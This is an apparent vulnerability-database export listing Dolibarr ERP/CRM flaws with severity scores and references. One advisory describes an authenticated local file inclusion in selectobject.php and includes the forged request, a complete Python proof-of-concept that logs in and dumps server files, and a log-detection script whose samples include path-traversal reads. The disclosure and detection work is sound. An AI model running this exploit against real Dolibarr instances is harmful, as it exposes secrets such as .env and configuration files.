scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L
1
value 1.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-7688
3
reference_url https://vuldb.com/submit/799337
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
2
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
3
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L
4
value 1.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value 2.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T19:47:51Z/
url https://vuldb.com/submit/799337
4
reference_url https://vuldb.com/vuln/360858
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
2
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
3
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L
4
value 1.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value 2.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T19:47:51Z/
url https://vuldb.com/vuln/360858
5
reference_url https://vuldb.com/vuln/360858/cti
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
2
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
3
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L
4
value 1.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value 2.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T19:47:51Z/
url https://vuldb.com/vuln/360858/cti
6
reference_url https://github.com/advisories/GHSA-rvwr-q5hj-wq7g
reference_id GHSA-rvwr-q5hj-wq7g
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rvwr-q5hj-wq7g
fixed_packages
aliases CVE-2026-7688, GHSA-rvwr-q5hj-wq7g
risk_score 2.2
exploitability 0.5
weighted_severity 4.5
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-srth-2stq-gyaq
23
url VCID-tmv2-39y8-f7f1
vulnerability_id VCID-tmv2-39y8-f7f1
summary
Dolibarr vulnerable to Eval Injection
Dolibarr ERP & CRM <=15.0.3 are vulnerable to Eval injection. By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious code can be inserted into the database and then execute it by eval.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-40871
reference_id
reference_type
scores
0
value 0.51559
scoring_system epss
scoring_elements 0.97945
published_at 2026-06-04T12:55:00Z
1
value 0.51559
scoring_system epss
scoring_elements 0.97948
published_at 2026-06-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-40871
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://github.com/youncyb/dolibarr-rce
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-05-15T15:00:17Z/
url https://github.com/youncyb/dolibarr-rce
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-40871
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-40871
4
reference_url https://github.com/advisories/GHSA-7cm4-vmf2-8wf2
reference_id GHSA-7cm4-vmf2-8wf2
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7cm4-vmf2-8wf2
fixed_packages
aliases CVE-2022-40871, GHSA-7cm4-vmf2-8wf2
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-tmv2-39y8-f7f1
24
url VCID-tsbf-m4eq-gbgp
vulnerability_id VCID-tsbf-m4eq-gbgp
summary
Dolibarr ERP CRM Code Injection vulnerability during installation
Lack of sanitization during Installation Process in Dolibarr ERP CRM up to version 19.0.0 allows an attacker with adjacent access to the network to execute arbitrary code via a specifically crafted input.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-03T14:57:17Z/
url http://dolibarr.com
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-29477
reference_id
reference_type
scores
0
value 0.00165
scoring_system epss
scoring_elements 0.37268
published_at 2026-06-07T12:55:00Z
1
value 0.00165
scoring_system epss
scoring_elements 0.37294
published_at 2026-06-05T12:55:00Z
2
value 0.00165
scoring_system epss
scoring_elements 0.373
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-29477
2
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-29477
reference_id CVE-2024-29477
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-29477
4
reference_url https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-29477.md
reference_id CVE-2024-29477.MD
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-03T14:57:17Z/
url https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-29477.md
5
reference_url https://github.com/advisories/GHSA-p73x-rpgm-3v56
reference_id GHSA-p73x-rpgm-3v56
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-p73x-rpgm-3v56
fixed_packages
aliases CVE-2024-29477, GHSA-p73x-rpgm-3v56
risk_score 4.0
exploitability 0.5
weighted_severity 7.9
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-tsbf-m4eq-gbgp
25
url VCID-v9g8-u2uq-7yff
vulnerability_id VCID-v9g8-u2uq-7yff
summary
Improper Authorization in dolibarr/dolibarr
An Improper Authorization vulnerability exists in Dolibarr versions prior to version 15.0.0. A user with restricted permissions in the 'Reception' section is able to access specific reception details via direct URL access, bypassing the intended permission restrictions.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-3991
reference_id
reference_type
scores
0
value 0.00051
scoring_system epss
scoring_elements 0.16414
published_at 2026-06-07T12:55:00Z
1
value 0.00051
scoring_system epss
scoring_elements 0.16377
published_at 2026-06-04T12:55:00Z
2
value 0.00051
scoring_system epss
scoring_elements 0.16458
published_at 2026-06-05T12:55:00Z
3
value 0.00051
scoring_system epss
scoring_elements 0.16457
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-3991
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/63cd06394f39d60784d6e6a0ccf4867a71a6568f
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
1
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:23:55Z/
url https://github.com/dolibarr/dolibarr/commit/63cd06394f39d60784d6e6a0ccf4867a71a6568f
3
reference_url https://huntr.com/bounties/58ddbd8a-0faf-4b3f-aec9-5850bb19ab67
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
1
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:23:55Z/
url https://huntr.com/bounties/58ddbd8a-0faf-4b3f-aec9-5850bb19ab67
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-3991
reference_id CVE-2021-3991
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-3991
5
reference_url https://github.com/advisories/GHSA-wppr-j57c-8jpm
reference_id GHSA-wppr-j57c-8jpm
reference_type
scores
url https://github.com/advisories/GHSA-wppr-j57c-8jpm
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@15.0.0
purl pkg:composer/dolibarr/dolibarr@15.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1225-a2a6-bkan
1
vulnerability VCID-1uje-n8xc-y7b7
2
vulnerability VCID-3xdg-az5a-dyft
3
vulnerability VCID-4c2v-phxx-y3h8
4
vulnerability VCID-6drz-jsq4-wyhd
5
vulnerability VCID-7ku4-fwqc-33ba
6
vulnerability VCID-7qjh-teat-tqav
7
vulnerability VCID-8fjr-6hdm-vqdd
8
vulnerability VCID-d4uk-4adf-mba9
9
vulnerability VCID-egxz-r3nw-xffm
10
vulnerability VCID-ewrf-wdsh-kqgs
11
vulnerability VCID-f122-u34a-kfcm
12
vulnerability VCID-htgn-37m4-c7fu
13
vulnerability VCID-j345-dk2c-yfds
14
vulnerability VCID-jbkd-su9m-3udy
15
vulnerability VCID-k9nc-tze6-k7bx
16
vulnerability VCID-mpmz-eh21-nkcm
17
vulnerability VCID-pfyf-s4fc-d3a8
18
vulnerability VCID-rqux-jkta-4kfj
19
vulnerability VCID-s3xn-47cy-eucf
20
vulnerability VCID-srth-2stq-gyaq
21
vulnerability VCID-tmv2-39y8-f7f1
22
vulnerability VCID-tsbf-m4eq-gbgp
23
vulnerability VCID-vp4z-qpc7-uug1
24
vulnerability VCID-vwxd-syyk-jueh
25
vulnerability VCID-w7ww-nq62-e7b1
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0
aliases CVE-2021-3991, GHSA-wppr-j57c-8jpm
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-v9g8-u2uq-7yff
26
url VCID-vp4z-qpc7-uug1
vulnerability_id VCID-vp4z-qpc7-uug1
summary
Dolibarr Core Discloses Sensitive Data via Authenticated Local File Inclusion in selectobject.php
# Authenticated Local File Inclusion (LFI) via selectobject.php leading to sensitive data disclosure

## Target

Dolibarr Core (Tested on version 22.0.4)

## Summary

A Local File Inclusion (LFI) vulnerability has been discovered in the core AJAX endpoint `/core/ajax/selectobject.php`. By manipulating the `objectdesc` parameter and exploiting a fail-open logic flaw in the core access control function `restrictedArea()`, an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as `.env`, `.htaccess`, configuration backups, or logs…).

## Vulnerability Details

The vulnerability is caused by a critical design flaw in `/core/ajax/selectobject.php` where dynamic file inclusion occurs **before** any access control checks are performed, combined with a fail-open logic in the core ACL function.

- **Arbitrary File Inclusion BEFORE Authorization:** The endpoint parses the `objectdesc` parameter into a `$classpath`. If `fetchObjectByElement` fails (e.g., by providing a fake class like `A:conf/.htaccess:0`), the application falls back to `dol_include_once($classpath)` at **line 71**. At this point, the arbitrary file is included and its content is dumped into the HTTP response buffer. This happens *before* the application checks any user permissions.
- **Access Control Bypass (Fail-Open):** At **line 102**, the application finally attempts to verify permissions by calling `restrictedArea()`. Because the object creation failed, the `$features` parameter sent to `restrictedArea()` is empty (`''`). Inside `security.lib.php`, if the `$features` parameter is empty, the access check block is completely skipped, leaving the `$readok` variable at `1`. Because of this secondary flaw, the script finishes cleanly with an HTTP 200 OK instead of throwing a 403 error.

This allows any authenticated user to bypass ACLs and include files. While PHP files cause a fatal error before their code is displayed, the contents of any text-based file (like `.htaccess`, `.env`, `.json`, `.sql`) are dumped into the HTTP response before the application crashes.

## Steps to Reproduce

- Log in to the Dolibarr instance with any user account (no specific permissions required).
- Intercept or manually forge a GET request to the following endpoint:

```
GET /core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:conf/.htaccess:0
```

- Observe the HTTP response. The contents of the `conf/.htaccess` file will be reflected in the response body right before the PHP Fatal Error message.
- *(Optional)* Run the attached Python PoC to automate the extraction:

```
python3 poc.py --url http://target.com --username '<username>' --password '<password>' --file conf/.htaccess
```
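A defender looking for this request in web-server logs wants to flag the `objectdesc` shape rather than the status code, since the fail-open check described above lets the request finish with HTTP 200. The following is an added example, not the reporter's PoC and not Dolibarr code: a detection pass over constructed access-log lines in Combined Log Format. It assumes that a legitimate `objectdesc` carries a classpath ending in `.class.php`, an assumption about Dolibarr's convention that is not verified against its source.

```python
# Added example, not the reporter's PoC and not Dolibarr code: a detection pass
# over web-server access logs for the request pattern in the steps above. The
# log lines are constructed samples in Combined Log Format. It assumes that a
# legitimate objectdesc is "ClassName:path/to/file.class.php:...", which is an
# assumption about Dolibarr's convention, not verified against its source.
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
ENDPOINT = "/core/ajax/selectobject.php"


def classify_objectdesc(objectdesc: str) -> str:
    """Label one objectdesc value: ok, traversal, non-class-file or malformed."""
    parts = objectdesc.split(":")
    if len(parts) < 2 or not parts[0]:
        return "malformed"
    classpath = parts[1]
    if classpath.startswith("/") or ".." in classpath.split("/"):
        return "traversal"
    if not classpath.endswith(".class.php"):
        return "non-class-file"
    return "ok"


def parse_line(line: str):
    """Return a record for a selectobject.php request, or None for anything else."""
    match = LOG_RE.match(line)
    if not match:
        return None
    url = urlsplit(match.group("target"))
    # Dolibarr may be served from a sub-path, so match on the path suffix.
    if not url.path.endswith(ENDPOINT):
        return None
    objectdesc = parse_qs(url.query).get("objectdesc", [""])[0]
    return {
        "ip": match.group("ip"),
        "status": int(match.group("status")),
        "objectdesc": objectdesc,
        "verdict": classify_objectdesc(objectdesc),
    }


def find_lfi_attempts(lines) -> list:
    """Records for every selectobject.php request whose objectdesc is not a class file."""
    hits = []
    for line in lines:
        record = parse_line(line)
        if record and record["verdict"] != "ok":
            hits.append(record)
    return hits


# Constructed sample log lines: one legitimate lookup, three abuse attempts, one unrelated hit.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Jun/2026:12:00:01 +0000] "GET /core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:conf/.htaccess:0 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [07/Jun/2026:12:00:02 +0000] "GET /core/ajax/selectobject.php?outjson=1&htmlname=socid&objectdesc=Societe:societe/class/societe.class.php:0 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [07/Jun/2026:12:00:03 +0000] "GET /core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:../../etc/passwd:0 HTTP/1.1" 200 0 "-" "curl/8.0"',
    '10.0.0.9 - - [07/Jun/2026:12:00:04 +0000] "GET /index.php?mainmenu=home HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [07/Jun/2026:12:00:05 +0000] "GET /dolibarr/core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:conf/conf.php:0 HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['status']} {hit['verdict']}: {hit['objectdesc']}")
```

Against a real log, call `find_lfi_attempts(open(path))`. The verdict deliberately ignores the status code: a `.htaccess` read completes with 200 because of the fail-open `restrictedArea()` call, while a PHP target such as `conf/conf.php` ends in a fatal error and a 500, and both are attempts worth alerting on. If a deployment legitimately passes classpaths with other suffixes, widen the `.class.php` test rather than dropping it.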

## Impact

An attacker with minimal access to the CRM can exfiltrate sensitive files from the server. This can lead to the disclosure of environment variables (`.env`), infrastructure configurations (`.htaccess`), installed packages versions, or even forgotten logs and database dumps, paving the way for further attacks.

## Suggested Mitigation

- **Input Validation & Whitelisting:** The `$classpath` must be strictly validated or whitelisted before being passed to `dol_include_once()`.
- **Execution Flow Correction:** The file inclusion logic must never be executed before the user's authorization has been fully verified.
- **Enforce Fail-Secure ACLs:** Modify `restrictedArea()` in `core/lib/security.lib.php` so that if the `$features` parameter is empty, access is explicitly denied (`$readok = 0`) instead of allowed by default.

## Disclosure Policy & Assistance

The reporter is committed to coordinated vulnerability disclosure. This vulnerability, along with the provided PoC, will be kept strictly confidential until a patch is released and explicit authorization for public disclosure is given.

Should any further technical details, logs, or testing of the remediation once a patch has been developed be needed, the reporter is available to assist.

Thank you for the time and commitment to securing Dolibarr.

Best Regards,
Vincent KHAYAT (cnf409)

## Video PoC

https://github.com/user-attachments/assets/4af80050-4329-4c88-8a54-e2b522deb844

## PoC Script

```python
#!/usr/bin/env python3
"""Dolibarr selectobject.php authenticated LFI PoC"""

import argparse
import html
import re
import urllib.error
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

LOGIN_MARKERS = ("Login @", "Identifiant @")
LOGOUT_MARKERS = ("/user/logout.php", "Logout", "Mon tableau de bord")

def request(
    opener, base_url, method, path, params=None, data=None, timeout=15
):
    url = f"{base_url.rstrip('/')}{path}"
    if params:
        url = f"{url}?{urllib.parse.urlencode(params)}"
    payload = urllib.parse.urlencode(data).encode("utf-8") if data else None
    req = urllib.request.Request(url, method=method.upper(), data=payload)
    req.add_header("User-Agent", "dolibarr-lfi-poc/1.0-securitytest-for-dolibarr")
    req.add_header("Accept", "text/html,application/xhtml+xml")
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", errors="replace")

def extract_login_token(page):
    for pattern in (
        r'name=["\']token["\']\s+value=["\']([^"\']*)["\']',
        r'name=["\']anti-csrf-newtoken["\']\s+content=["\']([^"\']*)["\']',
    ):
        match = re.search(pattern, page, flags=re.IGNORECASE)
        if match:
            return match.group(1)
    return ""

def looks_authenticated(body):
    return any(marker in body for marker in LOGOUT_MARKERS)

def clean_included_output(body):
    for marker in (
        "<br />\n<b>Warning",
        "<br />\r\n<b>Warning",
        "<br />\n<b>Fatal error",
        "<br />\r\n<b>Fatal error",
    ):
        pos = body.find(marker)
        if pos != -1:
            return body[:pos].rstrip()
    return body.rstrip()

def login(opener, base_url, username, password):
    code, login_page = request(opener, base_url, "GET", "/")
    if code >= 400:
        return False, f"HTTP {code} on login page"
    token = extract_login_token(login_page)
    code, after_login = request(
        opener,
        base_url,
        "POST",
        "/index.php?mainmenu=home",
        data={
            "token": token,
            "actionlogin": "login",
            "loginfunction": "loginfunction",
            "username": username,
            "password": password,
        },
    )
    if code >= 400:
        return False, f"HTTP {code} on login request"
    if looks_authenticated(after_login):
        return True, ""
    code, home = request(opener, base_url, "GET", "/index.php?mainmenu=home")
    if code < 400 and looks_authenticated(home):
        return True, ""
    return False, "Invalid username or password"

def read_file(opener, base_url, relative_path):
    status, body = request(
        opener,
        base_url,
        "GET",
        "/core/ajax/selectobject.php",
        params={
            "outjson": "0",
            "htmlname": "x",
            "objectdesc": f"A:{relative_path}:0",
        },
    )
    if any(marker in body for marker in LOGIN_MARKERS) and not looks_authenticated(body):
        raise RuntimeError("Session expired or not authenticated")
    return status, body, clean_included_output(body)

def parse_args():
    parser = argparse.ArgumentParser(
        description="Authenticated LFI PoC against /core/ajax/selectobject.php (Dolibarr 22.0.4)."
    )
    parser.add_argument(
        "--url",
        default="http://127.0.0.1:8080",
        help="Dolibarr base URL (default: http://127.0.0.1:8080)",
    )
    parser.add_argument("--username", required=True, help="Dolibarr username")
    parser.add_argument("--password", required=True, help="Dolibarr password")
    parser.add_argument(
        "--file",
        dest="target_file",
        required=True,
        help="Target file to read (e.g. conf/.htaccess).",
    )
    return parser.parse_args()

def print_result(path, status, raw, clean):
    print(f"\n[+] HTTP status: {status}")
    print(f"[+] Requested file: {path}")
    print("=" * 80)
    if clean:
        print(html.unescape(clean))
    else:
        print("(No readable output extracted)")
    print("=" * 80)
    if clean != raw.rstrip():
        print("[i] PHP warnings/fatal output were trimmed from display.")

def summarize_error_body(body, limit=1200):
    text = html.unescape(body).strip()
    if not text:
        return "(Empty response body)"
    if len(text) > limit:
        return text[:limit].rstrip() + "\n... [truncated]"
    return text

def main():
    args = parse_args()
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(CookieJar())
    )
    ok, reason = login(opener, args.url, args.username, args.password)
    if not ok:
        print(f"[!] {reason}")
        return 1
    print("[+] Login successful.")
    try:
        status, raw, clean = read_file(opener, args.url, args.target_file)
        if status >= 400:
            print(f"[!] HTTP {status} while reading target file.")
            print("=" * 80)
            print(summarize_error_body(raw))
            print("=" * 80)
            return 1
        print_result(args.target_file, status, raw, clean)
        return 0
    except Exception as exc:
        print(f"[!] Error: {exc}")
        return 1

if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except KeyboardInterrupt:
        print("\nInterrupted.")
        raise SystemExit(130)
```
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-34036
reference_id
reference_type
scores
0
value 0.00015
scoring_system epss
scoring_elements 0.03136
published_at 2026-06-05T12:55:00Z
1
value 0.00015
scoring_system epss
scoring_elements 0.03146
published_at 2026-06-06T12:55:00Z
2
value 0.00017
scoring_system epss
scoring_elements 0.04423
published_at 2026-06-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-34036
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:14Z/
url https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a
3
reference_url https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:14Z/
url https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-34036
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-34036
5
reference_url https://github.com/advisories/GHSA-2mfj-r695-5h9r
reference_id GHSA-2mfj-r695-5h9r
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-2mfj-r695-5h9r
fixed_packages
aliases CVE-2026-34036, GHSA-2mfj-r695-5h9r
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vp4z-qpc7-uug1
27
url VCID-vwxd-syyk-jueh
vulnerability_id VCID-vwxd-syyk-jueh
summary
Dolibarr Improper Input Validation vulnerability
Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-4197
reference_id
reference_type
scores
0
value 0.53316
scoring_system epss
scoring_elements 0.98032
published_at 2026-06-07T12:55:00Z
1
value 0.53316
scoring_system epss
scoring_elements 0.98031
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-4197
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://github.com/Dolibarr/dolibarr/commit/0ed6a63fb06be88be5a4f8bcdee83185eee4087e
